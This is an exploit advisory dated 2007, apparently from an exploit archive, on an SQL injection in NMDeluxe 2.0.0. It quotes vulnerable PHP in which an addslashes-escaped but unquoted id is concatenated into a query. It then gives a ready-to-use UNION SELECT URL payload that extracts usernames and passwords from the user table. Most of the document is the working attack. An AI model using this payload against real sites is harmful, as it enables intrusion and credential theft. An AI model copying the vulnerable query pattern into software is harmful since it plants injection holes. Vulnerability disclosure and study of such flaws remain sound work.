Home / exploitsPDF  

nmdeluxe-sql.txt

Posted on 31 August 2007

######################################################################################### # # not sec group # http://www.notsec.com info@notsec.com # # # [NMDeluxe 2.0.0] # # Class: SQL Injection # Found: 30/08/2007 # Remote: Yes # Site: http://www.wsdeluxe.com/nmdeluxe/ # Download: http://downloads.sourceforge.net/nmdeluxe/nmdeluxe2.0.0.zip?modtime=1178396844&big_mirror=0 # Author: R00T[ATI] of notsec # Contact: r00t.ati@notsec.com - http://www.notsec.com # ######################################################################################### Vulnerable code: index.php ============================================================================================================ if($_GET['do'] == 'newspost') { $newsid=addslashes($_GET['id']); $sql=mysql_query('SELECT * FROM `'.DB_PFX.'news` WHERE id = ' . $newsid . ' LIMIT ' . $nlim . ''); ============================================================================================================ Exploit : ============================================================================================================================================================================================ http://www.site.com/[nmdeluxe]/index.php?do=newspost&id=-1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,concat(username,0x3a,password)%20FROM%20nmd_user/* ============================================================================================================================================================================================ Thanks To: ================================= All notsec.com members; White_Sheep for his Bugs Hunter; =================================

 

TOP